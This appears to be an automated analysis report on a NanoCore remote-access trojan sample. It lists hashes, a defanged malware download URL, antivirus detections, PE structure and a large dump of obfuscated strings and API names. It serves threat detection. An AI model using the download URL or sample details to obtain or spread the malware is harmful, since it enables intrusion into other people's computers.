File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 203.00 KB (207872 bytes) |
Compile time: | 2015-02-22 01:49:37 |
MD5: | 12ee889f3a4da0ad4431f67b30b8279e |
SHA1: | 7add1d715851eca2875c6617999a58ba7ceca118 |
SHA256: | ea721b83c12fd31e7df6bbf8d1516c663046cc809e6fa2672b27b3b6c113bf23 |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .reloc .rsrc |
Directories 3 | import resource relocation |
First submission: | 2018-01-14 22:51:02 |
Last submission: | 2018-01-19 19:19:28 |
Filename detected: |
- 4.exe (2) |
URL file hosting |
---|
hXXp://[www].pizzadenis.fr/4.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-01-13 22:53:07 | [54/68] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x1c798 | 116736 | 5ea4b6ffb697f8c97d46e21bad228f9d | f886021a6ab7dabf6510b98974a72953a32dafa2 |
.reloc | 0x20000 | 0xc | 512 | fa81a8e21b7ba0db59d9a42aa7a5e570 | 73c936b34cc7723ee95c73f137c13c4ffafdce53 |
.rsrc | 0x22000 | 0x15fc8 | 90112 | 7f56dac358842aa444d20062a296ba97 | ba4165dad4e5e17b087636de2fcd386e3d16f029 |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_RCDATA | 0x22058 | 89968 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
KERNEL32.dll | |
ntdll.dll | |
psapi.dll | |
mscoree.dll | |
DNSAPI.dll | |
ADVAPI32.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
]"Q+a-Y6I
$#%#&#'&98:8;8<8=8>8?8@8A8B8C8
#=qWaMf_MISHPEu34of2Bm5$ay6Z6PuaGN7w1jlKYjzwdE=
2o`$
#=qzRf5_jFnPo03SqY9Fq$uTg==
#=qEVnoj7wKonGmgnYpK7PNGg==
DateTime
+0%mK.S
f4:a
FindResourceEx
Int32
-S8*
BVD}
H!q;
ValidateBlock
#=qHiBdWLOLLVg67b8lN8FRqgmYNWZfcDieu2MH9_zIY6Q=
#=qtDC6IoLr5pnMo1d9qdAc2TBOnWqOdlEZHf8Itbl8cJc=
GetBytes
#=qPNzwB3EyeKwH$TwKjEdAjAC6A3IlGhANCdkUFCgvEiw=
O?064&-TY
#=qo734_kbse$6lTIlwlz6A8A==
#=qYuHUjnyRYHZqCkKAt0jj_9qFBzmTZKte4i1ou04eBWY=
o7~O
#=qjcSlrUNMLgvZWN$58FXdrl22$0OjCpoqksNsslRtIFE=
SocketError
t@syW
c-[W
ResolveEventHandler
NtSetInformationProcess
jne{G
get_Height
#=qQbsDS5g6rYgVt4AUW_pPJ8MQlCJBs7uyF9EY8OKREmQ=
/Ns$
3Fds
'N?K
#=q5MtzoDWNtlkksfPTHs5qXlK2k7ZehKenYzDJQrgdOII=
#=qM4zv780c6Jc3GVu15xhaulIEjuiWD$RKEtosugOXKLA=
"7xM
#=qs1aB65G6$bPi1$cdOrXkCA==
AwF9
a~aX
@BA{4
#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=
y}o~
#=qixBu4j6Hm11f3$mLrzkCcE4AVWtWeNn5nQguwdGbWGg=
6ZB{
Kl&]]
#=qqj4vWwKBJgvjF_JTc8V9cQ==
fG6@
#=q0uUZuMiILVbPeB$t7lx1a0Is1IW4CfkB9ovgW99kERQ=
yq[2
#=qyNgKOA3iTYvKx8QtBmkDXA==
/-~7P
Version
#=qbbSw65PC$nto6DJiWxTawg==
#=qjVLlQtRAzKVOtyLrw5PhiGVVmXqMJJOsTT5DxaenWCY=
4Dx,h
uGv`
IEQ:
#=quO7UmvJ4RBuIIChSn0jx_M$HL4rBuRuRZnNBEMlpsJw=
/[ {
#=qyM$eq2QFDjIwNzxtrtw3WE5gHFsUOsREqnRunYWzTvs=
ReadAllBytes
DebuggerStepThroughAttribute
Xvz5
U q^`g
Xf(PP
9d^g
=ft#Wb
v$_]
N&]WzS
zHs
T4iAE
*}}^
#=q4kUEXPi93MnvgzV6ySNPRQ==
{3 %
#=qvX$J24rI0eJ0gWfA6CEdzVJN7bQN_YTuS98N0yyMYPo=
#=qYpD2x2QTNARNJcnXxG0OjQ==
PtrToStructure
#=qA4f0kKyGXTRnU4z03oji_RIPyVnvoC_BRjpESDLHXqY=
lHh %
Marshal
!F;'
#=qw1t7iX7Q4P$CBQxdhg13BQ==
CIC6
#=qTAs57ZkYafcLC2FZLCGAiQ==
#=qUDQctXsgw3eGxqcYAxP8MQ==
#=qCKX0qzAtjLAL9KBPrJWkOA==
D1+lG
J$
#=q48p8EJcbwRuSJ9efJfzTZ7uyOBVlFQpnFVv30w93EJA=
I")k
#=qZRkZQGrnZUWoFBVE_TP$5Q==
ProcessStartInfo
OQO;p
?'l
pTY_
#=qm5VvJvLZD$UcnjvypC5XcA==
SBEI
#tM]
(Y
%~nH
XaX
XaX
#=qP42Tluk0y5t5VrN_nwVhnaX9baaRq2NaLaW6RMHNX_k=
ControlFlags
OpenProcess
ca X
#=qw42CdKVHw2dycv8VU7DItg==
#=qFgBBonKcV6U3Je0BKZZdAZdyEla0MkDel5SRrEzLUvs=
EndInvoke
- (/
>jwtgq
@y%\
IClientApp
#=qRpw30Lh0nfhDryqjhyjikg==
TTdC
xztd%
#=qABNlGFDc7nOg_C39swAcLA==
#=qQ_BBkbckkXGbXV1nE4Sw4w==
1UlJ_
|tv`
x!c9
6TRC
@0aHO#4
#=q8McCIarwH$XScVz0xkTmJw==
#=qjIje6jGWLd2EOkfZXKqBbg==
=qD<[
EnableVisualStyles
EndOfStreamException
#=qKwlvi80KuDBelBsvucNuhRsqXRtqCfWqVH1dUPmd6_o=
#=qc46h_4WA5z0UkWODs1nwXg==
=wV{?
-*&{c
8W??
#=qIKJSaaKraxRzi3AD57FKg9MQkSdmOqUcHNxKjSZFGkg=
#=q74AbaKJhduohKQ4YDrC28g==
JUMs
Increment
Qm23,[D
IClientNetwork
AHT*
!SZN_t
&XU:
#=qiGEsYAsOSz$jy0hyBv5MGPdLIlePpwWMgCE_Abe_mLY=
gNC#
#=qGqLDylJy8NmMEbMDJmKtoQ==
^['g
#=qyGoc_ssbL9RdagmvuBld1Q==
Lf`!
v,J|
->&~
^I &@
#=qtRuLPG6CownVXpQS2Jma6EmxR$R$u15FKPRjOSzCUIw=
&*&+
#=qDJ4yS7fCDfIiEVFkwyEE6G3$$73HwRgy2_eKZUkxaSo=
Format
#=qalo3zYdlWWh$dYSx9JnNrw==
J5h
>"P:
bZ]
#=qqnp3i0xG3gb2LwEmwQLB8NQerATuB2G0aH1k$$26lgk=
#=qYGqPwTlQx5HSyCMpKnJtwO$bA4uyJcKD$pA6WpBamRM=
#=qKraENZVscKMtH4GMIJjzqA==
#=qUbRtqAPcSxRMI51YgNXGZ9omJvV5BvuqBNocgi7xl6Q=
z'Y+
/]V4.
"MFt&
9QEq
"|w,
GetDetails
#=qqCUKpKbVq45Cc9OUN5wTXw==
V !*
->&(
AppDomain
p(ob
#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=
/4Fb%
2qXm+
s%dEUK
.ou@01
a]+S
afeffefeeffe
&?f\
GetUnderlyingType
wJ-;
fC'9
ThreadExceptionEventArgs
#=qyI9vgsKRXHDyyks4VCAjzA==
/s6IS
+;..
get_Assembly
#=qth3CIdKay4zIa5SBJzx7eA==
5@'7.e
=aRy :M_
#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=
#=qV4bSY95FY8CPz8U7EzzkRg==
h S
OpenSubKey
>kka}
KKzI
#=qsR25pLrAgwps$DwdB_BuUbMipiUFFEDkypROuvRRPj4=
#=qj8dHXOkfX1HmIFktLFgFBNrpDhCGGJk0RPJopDOaBy0=
#=qcDfNIFv7M2KbeeK2ufHf3w==
TextWriter
set_LingerState
Va4D
#=qCN8q7dxuBuds3rgIjZ1oLA==
-@wf
#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=
#=qG8K0lOrmHWfP2KExoNv$5w==
pT#i
AssemblyTrademarkAttribute
#=qcfHq18AlWjOy12tBCM8Tbw==
SecurityIdentifier
bK$YA]
RebuildHostCache
#=qXzNbY0aXEU2Rr2_Jbe87og==
#=q$6Q_u19FhL$wNOun9AB$CQ==
#=qedcCJsW_6aMZb5lO3tR01A==
x z
#=qM040QWzx1oySCgUyYWc9zA==
Path
wvs`
#=qr9m9EjuYAP$2E3p2xadfFhcTH6toAhrm0dlfOTldiWRsdXd8UmnkRkYrV_8$1gaA
ReceiveAsync
+|Th
~sEwfc
#=qHtuZg55b91a614FmHMsOMQ==
}.'L
(Ln0
#=qI2pAr92bRdzddapVaPVhbQ==
Zc/3
p:SS
#=qrSKFiRrFo6$kUL7kjfG3zg==
:JP;3
#=qJ8bMKCzzllPDbJIfPSoGMA==
#Blob
Control
#=qgAKbtXqj_idozuy66wPGJA==
#=qTEC8gcgkt672qW159Oe_Iw==
*ojf
hePee
#=qCeF2tfSXulrE0bbyPxU$1ik7Jf3avSO4FKBmKNH9QLg=
#=qbYAYBaHwcEbf1CaxjAi1bw==
@aP
Z]MY0
#=q$Rh_ulnlhN$9Zn9n4fKAsvWT9cisaHT_PgvcGANnd6o=
=oj0z
ToUInt32
#=qVVQJ$z9bl7kHgfvJohZnMPofzhiFJ4f4yMGK7Tpp6xg=
*%]6
vRjl
+ 8B$
ReadSingle
(v/
#=qDB62T9X0iP_6WNTXOuwQnA==
#=qp4XZ9Ss3K04S36I$7WhtwQ==
#=q6jLYuOOmC$a9_UySsUlsFA==
,Z*u}
Type
hB\3
j>k&
, &oh
3+K5
QsoU
#=qphSRC1xHjYarc$NSFAVMID1iP8dwbr6BCaxyrkptDP0=
BaseCommand
.x^
+xr/X
!zs
#=qsYpthruwyrknxFdWaNp9Vw==
#=q$XurN5kwCvUuDGDncP4myluEGVmoB5AfvTb_Ct0PT5c=
4qTx=
#=qraB64nHTnRXCE4d7ffs5aGExarxpEh0COAPaEFI5iV8=
#=q9RHjNFjnLkbqjNKidtUNeAGLmByWXgbKwjLfhcq9NOc=
#=qtWaDSiZ3KDHpQtSfxDZV0w==
#=qChXzjuiVYrb8OlqJPajoUA==
+ +
nCaa
#n[r?TY
l'rX
#=qEqEPF0jj3sUIryvQNEKKCV9boaHFZuHXMROqSn28L3g=
#=qEk42FAaXkrNIu2TP76IakA==
#=qP_nucp5xdFjeAVWRfZ2XfmvYhkwWbeeu3y2fkxvS0yA=
#=q7uQjJN4fKJgs403tXnERFbQ1VWp3FBsMW_1ZAWZtc1g=
Jfif
ug(xw9
9N4O
.{(!
#=q7b0FP8eSMCctHkHIxEb12w==
Item
#=qVqTMYHwCmwUHM6kkpNkbGw==
#=qQRAhbbFlVBfqrgso8zehPg==
"%(L
get_ExecutablePath
9feffeeffefe
Char
vt+W
qfCC
ExceptionData
#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=
mq*
*&+
\p1E
#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=
(a
get_Name
GetValue
#=q9VIijSO53lpTS2jV37$Suw==
H:R o
7Rk1
HashAlgorithm
sUjT[
get_Y
#=qgB3pFGrOVxm7f$sXZD67nQ==
z#I[_
^7(=H
_Lambda$__3
_Lambda$__2
_Lambda$__1
&+:+
_Lambda$__7
_Lambda$__6
_Lambda$__5
_Lambda$__4
#=q3vPs064Rj1jBOLtFVqV4DA==
#=qrPQtMswclvOlK1AxL1S4K8M$owLGUpQfjJA8CWW$fj1az7m8LFibY8IeMxHKi4wi
_Lambda$__9
_Lambda$__8
Bl6
#=qQKYqF9uhb3QdjdrkvuxjUw==
|c!W
-! Jo
8::d
Y(
+Rmq
#=qyU_gXk4hv73zg3zoSZSLhQ==
#H,p1
_~LYs
#=qRHdMxv5xMrip5nI3eHU3Y52nJ9DhG_ImQVoJh$ooupk=
#=qLLh1749MqIyRucx6BFMp7Q==
q'vAZ
[h "j
#=q$7KUBFuOZT85iBmKYeGgXQ==
StandardModuleAttribute
N3`)
+}nw
#=qeWvkoUO61qxfYbQKV$cOPQ==
#=qAkkjpY6IHZssIsQ9hAxzTw==
GetParameters
<Gb5
o(,O
oy
3Z+ +
zhXK^.
fefefeffe
DialogResult
ToBinary
LogClientMessage
cJe$vc&
M}1_~
.text
List`1
#=qj9swjNLNpEBN8mkOlVmrOw==
b@JHX
GetString
#=qAM4ZJ3aDwBm_a3IkqHxLmjdKzHIQbFeE9thLHux2o6g=
WindowsPrincipal
Component
LockResource
BuilderSettings
BY14
9Hr`
,$+
GetDirectoryName
#=qqRc2eOIidDtWq4y7W2lAhSyv$pBRJdAsYlXSRUcwizw=
#=q$mqGRbJ2J2TNgadoLHYnIQ==
#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L
!J r
'OwK
get_AddressFamily
-,&~~
#=q6TsObh1LqPbvVPPz_YjbtgEdyXL$082jRqG42$db3nw=
#=qe9p_PgOCiouYWahOSDKth00dr9CdsTb1R3DYgCeLUBw=
#=qrmavK4kbgFTgX3_IUlEoRw==
#=q4X5fhkJm5XS4LlpLIyB6bA==
`hYTd
7,Rz
#=qhE2P2k46jiSSjO86g3nB1MkLGC9_3avDpI7iYbUHr5g=
n U,[s
G[|^8
6lR@
#=q9rPQSTp$UBZiTGc7mKlh7h1QvRgfs0p_mQAaIRjRIsQ=
D3IN
E\^Nqi
#=q6OqJPhANvYfkdc5uh_IKsUbLoI4zVFCxs4fpu7Vxr_U=
Single
#=q95w9MpaG4ZcgkGgnmQITOdHr5IaLXD8aC6o3EqtE0PQ=
u;4
#=qABSlSWKh$8sT$UF4sG_vQMmKqh5lDRXHlL1yCp0W8x0=
/q8(
StackTrace
#=q4P1tyVDbmSIMgskx0BrPh5ZxjoQy0earrulDSsNhpg8=
#=qRbDxNN_CBpjdn11hjtWoZg==
Monitor
#=qUVvjDZc2eypEDWG9cFZdTg==
ReadInt32
#=qxYJIjuXFTjRvt41we4akdH1WN2nLMpesVOXXsYuSrHM=
#=qsLIORBvLMZm5c5Lb9Cm$GQ==
uT*o
_fm
get_Variables
IvMJ
EF M
i;kR
#=qZnbTkU5kDU8O8$hMGiNZlQ==
CreateDirectory
PluginCommand
PipeClosed
*+
StreamWriter
`V0u
-m:+O
X pp
Yk4%
#=q4o4zrrzr7uOw3pySDBOwZtAOdlhvudqcbIbhABkQfe4=
{c4AD&
$eVP
lWKhz2
ym|4
Q6Qe
M(,9
#=qnk9x1Gmlq5UZ_X95yAl14A==
>l )
0U!I
- & +
GetKernelObjectSecurity
GetCallingAssembly
WaitForExit
uE9T@
TZ<:
#=qOWs9MBREWujnaIdYgAI1lg==
#=qhv_9OQaSyr5PWElvgkBxFw==
#=qScWgGHvDwJ0da_7qXoO28aGE1ea7zp5$XjEJLTXkuHQ=
System.Net
l7%c
Conversions
[ji.
a=uj
#=qpSjmalSIZ6iBUAWRLBOkQ5sPqtZAetb$LjkOVwAdUac=
NfefeffeefY
#=qD3hoTFeBJT$SvX_fQh_aIw==
^sV-
#=qBk9t7p9S5R095rOkFdE8GQ==
- &&*}
%(L
CreateDecryptor
6I( f
add_FormClosing
#=qArVl3RpI3eEiVf0qXoqrWw==
#=qcDgE7pmQv6niirKxFRMj7Q==
StackFrame
4(\G
#=qpghRvZG4ZfcsmvAYC$o8qN0WjB387Pn9cG$Y9HJ3uwU=
kernel32.dll
eY^d
'$^b?
#=qoT5qP9FYCI8F5V3gKO7eMg==
![Qx
igz
#=qL2Az2fdQv6DkEBC_x$bbMA==
GetHostEntry
r=+
<generated method>)
#=qXyCbQ53pEXrdqhJ6oXoHqg==
Enumerator
#=qlt$K8Ex4tZEPwTl4RuqGMw==
#=qAp_zHqT7acjq$QNiBoq2EA==
A8w>L
,dS1
#=qfvzoVBS4j9KdxyngOlL_NauqVYLAaOZVw9dutKQSAp4=
p!^Cu}
HUTl
DeleteValue
1KJd_:
Shutdown
#=q3fzZpU7POi9yYKua762KimE0tXDV2VRrjyJcPuwXgTs=
w}'w
<qY|D
#=qNdKVs_XU_xYgnUK9ZfVshw==
&K70
nt7
#=q6FX$JRP_bY_ZCQbx1UwWug==
#=qwSPuuWVW8tz$gDazhda2d$myXXX0Ro_wRP7Rmm8JiiT9wA1EeeaPUV2jnUkQOCHa
#FC({P
E%(L
#=qY9NY2gigPsj8X4CYx0UCT2vGlqkgsq6GuC2fWqP3Voc=
']mh
u[5x44
-4rd
#=qOKSmYE47P2z$UXqGETlnfg==
#=q3_xjz98EYRXgLslROl8imQ==
add_ThreadException
P'_{3
#=qhPbzHXREadcUSl6d6LhVYw==
&+W +
NTx
&?\]
B#NN
t&XJ
MYY/E
jX
k**t
Computer
EK^$M
#=q$E54nUJeqC5jURP4oCRU9g==
,K+
#=qV9UIxiLyaOi7XoTx2DUJwr8Ior26OirSZwM3mOvftrw=
c6#z
#=q0msvLo3fKjQ5ucIFxkdur24Cc0tFDGimgcqgtAeKZq8=
#=qh7diH14jww3Fm9rMJ_jIfQ==
#=qo8RCFr_ecPE9NSA5cyD6QQ==
Ks p=|2
~A
%t8
#=qUomzGDQTZY7jASgBmW35Fw==
a}+
#=qYiXVlu3YVR5erIxfIIBHo1Gv4y4z4vrtnS$$9CALbVE=
- &&
cFIr%
#=q2c1dOwAlqEVK063i13$4Vg==
#=q$P4U7B6$qbq6QJ_QX8MfyNoxYRq3foNT$OZzr5yEqDQ=
#=qonMVJIv_P7bZ29oJ_eSSxA==
**>r
`2 LY
Bj&W
vtn;rZ9*
96#`
j^nd
0} jj_
\aHaV
oJGI8
#=qH8FTQLBlM6o0t6zf8SLPUg==
FormClosingEventHandler
get_ParameterType
q'j>_
#=qQCd2OoCcjOFxsuzhZKv2M7$UnAX8JX19NdffDxgtv3I=
3lld
}LwMB
#=qFU5Nq8bBPIPoBGBl$k8ehEhmgSoFzsflrFNnOQsCK6E=
OE~
L 7%/
Q*h3n
Process
-pQ (=
^YFN
K;VS
#=qWcYPgOJASLG6mRBDPhOIZERKO3Eig2IiEWCrUa$w_Mw=
K[w2
1gn"
d-@%
#=q6oykuAaezoPWCQHwIFBGYQJoT_doGKMmOjpzn6ZJomA=
#=qb$tFKVReqZMI9M678cKWGdlE1UJqJBfHAfOfQhXuW5c=
hLG"*
#=qWNtQAckY3EoQ$HeRpEQ9MEcj4oiFXpw6QZThgsGNZIA=
>7]v
#=qp7rlpRCprgGh7RCnHteaLw==
H,
'%(L
set_IV
6z[8
+1l7J
G0$.?
xF++
' * ,
#=qFlM8LWSzwV9qMKMd32mVdQ==
#=qHauijmh2nJ5kHO6fTYBnJFZKkfzkWt5gB4mYS5OLOVc=
NanoCore Client.exe
* o@
* oA
v(.N
~Y
,+&
#=q6zjWArzQ8Jv_1waqxSeP8A==
Q|p!O
sFXU
#=qDOdV5duF980CDFSFl8oQpw==
#=qNz_Hz8DMWPqA8pVcg8d0UVymwvCurvyYgdZaMK3OhQE=
#=qYGU8a5KOsYzqpvljkWGWKuQS9mZuJYQa$8g5J6c9rho=
#=qKYm_FHWoJ42y$VrakLgWfw==
UInt16
#=qCgskv3QU4cEy8M7hqvNNBbFyow$DvbmSQrN8A5JJJWs=
Enqueue
#=q_WoKv7McWxMc2YtmbiVaCw==
#=qUZMwlqlTBPLi1iscPEnOdMZqp5jDsQ1UK2Kgux$Yn40=
WM4;
O`)'
kE'R
#/.E
*q*[/
#=qrWXrfWfqyzD06oY$LsE9ww==
1 eE
,/(9
)Wf%
gUTP
q4(Y
#=qqROT7DfncW7strhZvp0iRQ==
xfO$
EndPoint
W-0 g
#=qy2xCoaL3Dm6E0MYt7i8x7A==
-G&
A!Rj
#=q4d$NdpGCMcL3TaMlT9EW69FacIvNnqDPMFNisgGhmsY=
n%if
#=qkzr_P52_BAWJXliKWvb8Z6oiWEishcUAemTNzwiiwkk=
{sC-
2GK
#=qCy_StxaanQioOSGQ9LimCF9_Wy9AMBNKclrIIUI0AWs=
System.IO
#=qQJBwIjtEvP$UD5Stcfj2wASGBDPz6YiX1yXx_MSfzPs=
$RWo
WrapNonExceptionThrows
get_Now
#=q9iu_XWrg9WTOw3hVDQcP8ZcABJLoMYtAY0HfRbaBN24=
7K78\
SufMBa=Y
IClientNameObjectCollection
Console
! RV
W:K.g
#=q637XAKKKpMW09u9r97v4lg==
#=qszlIp3ITaFi0VCgRIaErNg==
#=q12n1704BGxiT9AoOoTNqog==
afeffeefeffe
#=qscQJIcBkI9VH8bZTZtABeA==
zUq*
#=qWsAxoahmYzeECOO4WB9kTg==
xc[[?
,@&(\
pkh"
G{s#T
O$>I
[&e (0
#=qpE_mRkS89WMXbQTdLD7bwp4pTt2zrWY_WBF1BLz1fes=
- &(,
h"?>
h: E
#=qaSWqhswYp72H_CatHelXxw==
#=qU1g6m1CiJ5yzLECox1hBrw==
sza)
#=qvA35ZDPTM3VgF89oJb9AmWFE4pqnIDYGjeV5H4uvblU=
- &(?
#=qPgHNba2TbLgSqrCvG0e5Uw==
6@?N
@ssY
STAThreadAttribute
SffeeffefeYa*&+
+ }
, + +
H}q
-\&~]
#=q37jfceDpvm0BhKQMkpktNw==
jk$A
ClientSettingChanged
/6A`Z
,l'O
#=qTfMnD_jfiITiB95ES2nWdLlDTdGOSDVgXEnjKNGkWcM=
B+YK
#=q_$06eDx4N3eSJzkchUhbnjKtHnRsckM7I4ZqcwfQO8E=
k{-{0
M ?l
GetConstructors
GetBlockHash
kVXa
#=qf3c4WtE$$thN5QyBMvo3u0lth2VF5hmfUsIv1r8yRkg=
#=qksh921Ur22JKhSIAXESSag==
#=q2gthvB62n07fYVTx5fwIqxBAo1t_hs$il9Ac$4FY_Gw=
#=qxG1wJpkOHyc4AD8gtAdxAA==
r
sv{s
aI+Yw
,++ +
-j&&
_7L
System
EventArgs
6:z'F
Application
{4`]
TransformBlock
#=qdzx0nDkNduYsJ$MOZBFb6jelzyvbyiG7So1vqpZnVLU=
lwu"
3dq3
`82L
-~:
#=q_UogavoS8ANyZp2cF0B9t7qG1b3QUqGTYeTlmQIKxqY=
,3~?
#=qDt_4RPbN$YmUyKsVRrbzrjU6uaXWwjHkaZoJAcuFCCs=
#=qQLqXliLS$ujl108DGV7$zv9jo8WyYr7oxBJvAgzllyk=
)OF8
**v)
'nK|
ClientLoaderForm.resources
#=q_jQLaNdtSDa6ovA0VGw50w==
3(Ya^:(Hg0R|
Y#U/
#=q7_KHECinDx5vq1IBX7p8Ow==
( . 4 9 > C ] i
#=qAfx0INrfgWoPN$Cz4VEZYVFcKNxFeYaixc4CaQpU$0g=
*71i
#=q5hEV9yBEvglIR94FFM9OBszK4aiazrmJrQshba2kpDY=
#=qAk5SEnvr6iWKzWTaOapTEA_BFwuNkz68xuZLTnuQOh4=
H;&^N
ToByteArray
#=qQtwc_i6uv63Hs$aOrPLxrMU9lMXbhRW79NANZrRxozw=
-~J
Z%]
DnsRecord
MethodBase
#Strings
mR;
#=qxLboOdsVFLmyLD939$tUsnUMYRMeFnzOLiWxQdY7sdc=
#=qFBEI0HItLMNpyOY0AgRxSg==
ua/_C
System.Collections
#=q1abXKhVCyzVldE9ra9z81A==
Tp%)
#=qtLsfqPVQ47D3cdxmiwAJAQ==
DOb_
#=qyow7wBpiCNNIoap9jI9L3Q==
#=qrcOHnfaYxPMN2$QaNhNmcA==
{Wj t
]`Eds
#=qrXs2l$bWJlHMZLHncLNYyw==
S4
#=qXuSOL4ETByiwdARI_Ds0Cg==
-"&~k
#=qlFQRS6FW1ex39P1F_VW7Eg==
`QP
#=qhYMTmNdkO7UsEcfduWinsQ==
#=q_gCP8hm5SSW7J$3R7xJuSA==
NanoCore.ClientPluginHost
-h]
0Qj(1
#=qwogjI4gN1imp1VeWLroXTk41PgYeLQ34zunh6NYu_3g=
Environment
RegQueryValueEx
/V02d
#=qxO41EOA8VDczxcMMPD9Hv85pbiPnTbukmYyDI5Z6X8A=
#=qWFUoT0l6elO8yn$hIYUL6Q==
o:&gST^
#=qF4e058OW__NtTzhWOs1UXEJiHrTSwnIZ3q2u9UaLbo49AZaoog8nMfoDeA9BGVvy
#=qbLBIoIXYNfJl3x9LHqBWNA==
#=q5$hUSQAZNmEXcUcvGVFJrlqtw6IWJBy6C7LN$kOmTWU=
.# G'
n\WY
#=qGfiJ4oSCDzJJaNmf22anQw==
#=qlMIFeU84lweg5Ul5iSg2vZUvNnPKw11XA1pEUQfzDeg=
#=qkgpjO3I2rdg6Il4nyqzgDw==
feffeeffeef
$.6y
N(mv
#=qdy_NHDvN7XTcQtWWMYxYKbuJqtXHsYJXM_YUEvVR0bc=
dRwj
O$$N
c(z|
*kV
x{{B
%vjM
NgcM
Decimal
#=qfkwtPDg_wfxGVFOXd$WnCA==
#=q2nHH3haw3R0VWVw4qHOwKw==
a,^L
#=qWBzgr2CJEoV4DPIbUzdZZA==
Aquz
q)Jt
#=qnDLRD4lBlfyGeJyuSeq2WA==
TI(A
Qqft
#=qOsVShdMttD8jGLf8zW9G7g==
ffeeffefeefa ~a
#=q2wxuRKC7TyzyevfrmeuJ$w==
get_Position
#=q7YEFsRA19ZrxKTBeL$y0fg==
{#B
GetType
ND$b
#=qbOmsEb0zGpdZukI0D4Idug==
#=q0yJsLo0aFpSu9ky8R9f$lw==
#=qZuX180bPJwK7MhIsqenk34Le3ZCQFFLgmBb4sMlYIpg=
#=qwWiTcboLi4zF4ycKWLBprqWhuc6ZDNNDjC8OE8DG1$c=
add_AssemblyResolve
#=qU_UZ3uhfwWgI9uBw5HT3xA==
ThreadStaticAttribute
OG W
0pkaV
#=qRkk_hj7p4gbUu59IVllqeQ==
8".82O
Activator
t|x~S
r$VF
&+? +
#=qVHGoZQC06Wdz1fJDKkoeiKu9aci51znqNtMz8dGZQMQ=
u /IH
9gB
7^0prs
#=qFWCMyHOrl7QbIPkMYdiWJg==
#=qoKX_5NDx$uDAqG3r2Qdnaw==
#=qJEtGIBRUjtEusa67yMyqWQ==
#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=
#=qyc0YQPNqWwZHkgNDV8lyIQfgMkEbGZtyDsLzhYmFp8w=
\PWS
L/Cj
Double
t&c)
ReadBoolean
'} .H
=1E3A4
ProjectData
set_Position
AddMinutes
ClientUninstalling
#=qd7oUKLFPI9nt8Ln7RU53xA==
#=qWkPc$uBFgJrhuimjKXkFcw==
dz,Bp,
#=qZhds7a6Pui$KE4m8ht8xuA==
Intern
MD5CryptoServiceProvider
8.0.0.0
Y&[
#=qNc0O1YGwS4NhcbB7sgpVgg==
`et;g
_UWS?Q0I
>l&!
#=qoTZi9XCxEGJXLELWnV3yfQ==
Nmzr
#=q6uR3lWd6_aD2reKUDlx$OA==
<7CV3P
i4R4
#=qvLrEXVjSw17e3P6GFPALhrZXcKcfxuk0NupQhKFf0VM=
get_UTF8
#=q3qYAJGveL_cxux6_2m4Vaw==
#=qGvpT_A2MS3Oi797y6jojBg==
wxB0|,
+d~,
set_WindowStyle
GetProcessImageFileName
#=qruARjy_8oZkz3lsHPGxBMA==
SocketAsyncEventArgs
g0G?H
get_CurrentDirectory
#=qq2h0VNJ4eWuHP5LphH0mpA==
#=qHU4s4cJ8BUWy$MQH9LPGxTniDgLcWFlt1CmhZ7PNRWA=
IU2Wk
@\9<
#=qa3EpMqO3KVCTrDUnetWt6fRbeWox1uN3vfSP5v_W_wc=
Socket
#=qF7qP$SJNVn6Q0z6ARFaJgM2aiYbkFhrfYn4Rl6Odj3I=
r M
get_BinaryLength
2 @
Q1 T
;5{/:
(oHA
#=q$XxqrIH7dyYqacMzR_CjGA5JAR0vUKiq1f0DFqS1mcI=
#=q0xixHwSTS$a9x5dtNZccvebVLuO4euYOepae9m2S64s=
n.B'
yjfj&
L^87
t-'%
,)~9
-<&~C
UnhandledExceptionEventArgs
#=qek1Oy3FoZ8ULt6r5iL2pEQ==
TnZ*
pc>Ek
7]rJ
#=qjM89gxwDLZ9izFxrYPCtcA==
#=qZb1TYPPMMY64aTN2MpcGOQ==
#=q5j3wvJXlnrGmRnKUHr_1SQ==
#=qRNkKSXdFDcR_p8Jbzx9WJQ==
#=qdw5QBoXX8FR0LrkjhWN3qw==
,mE5
-%&
#=q8NzetUGGc1cM4ZGyRGGlug$fKAOwmcPqe4nFzDGKLk0=
#=qay$wDBdxvh$MBWrC9YMhC_f55kIvkv7I_BjPu_7Ajsw=
#=qRtpaHvp1hQcEDS$UubP_mA==
#=qCPeeDj1tZ3_XePWJJx7FTlBzWHbtSGvCe1Je6nRznW0=
}?z4
ntdll.dll
HYks
FdlvK
[SZB+T*
*J\e
-%&&
Form
#=qkbMW3ViV2G4xkJU4KS4XYUwKzC$oNmhjZ49L9c8BrOM=
get_ExitCode
J!th
#=qi6IJz6lHhd8GI6qygHcvTxSTD2wk_BSYwC2NR2eR0yg=
#=qJ2Bo_iSk1Tt7sQHk7C2ESQ==
#=q6wR5WMLGkL9afTpqmWsw9g==
